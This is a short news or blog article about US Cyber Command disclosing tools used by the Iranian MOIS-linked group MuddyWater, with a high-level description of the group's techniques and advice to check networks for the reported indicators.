The US military’s Cyber Command this week detailed multiple hacking tools that officials say Iran’s Ministry of Intelligence and Security has used against computer networks “around the world.”
U.S. Cyber Command’s Cyber National Mission Force identified and disclosed multiple open-source tools that an Iranian threat group has used to target networks in the Middle East, Europe and North America.
The “MuddyWater” threat group was described by Cyber Command as a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS). The Congressional Research Service last summer reported that MOIS “conducts domestic surveillance to identify regime opponents. It also surveils anti-regime activists abroad through its network of agents placed in Iran’s embassies.”
Cyber Command said should a network operator identify multiple tools used by MOIS on the same network, it may indicate the presence of Iranian malicious cyber actors. According to Cyber Command, the techniques MOIS uses include side-loading DLLs to trick legitimate programs into running malware and obfuscating PowerShell scripts to hide command and control (C2) functions. New samples showing the different parts of this suite of tools were posted by Cyber Command to Virus Total, along with JavaScript files used to establish connections back to malicious infrastructure.
As threat researchers tracking nation-state sponsored groups, they doesn’t often get a glimpse at the organizations behind these operations. U.S. CyberCommand provided such insight by pointing the finger at MOIS versus the Iranian Revolutionary Guard Corps (IRGC), which in the past many security experts had assumed.
MuddyWater has been actively tracked since as early as 2017. In a recent blog, SentinelOne reported that they continue to see the group innovating: improving their custom malware, abusing tunneling tools, and adopting open-source exploits and frameworks to target Microsoft Exchange servers.
Like many other Iranian threat actors, the group displays less sophistication and technological complexity compared to other state-sponsored APT groups. Even so, it appears MuddyWater’s persistency is a key to its success, and their lack of sophistication does not appear to prevent them from achieving their goals.
The U.S. government identifying Iranian-state backed activity the first step to doing something about it. Organizations should check their networks for the reported indicators and behavior and, if found, let the government know.
From the Shadows Emerges Knowledge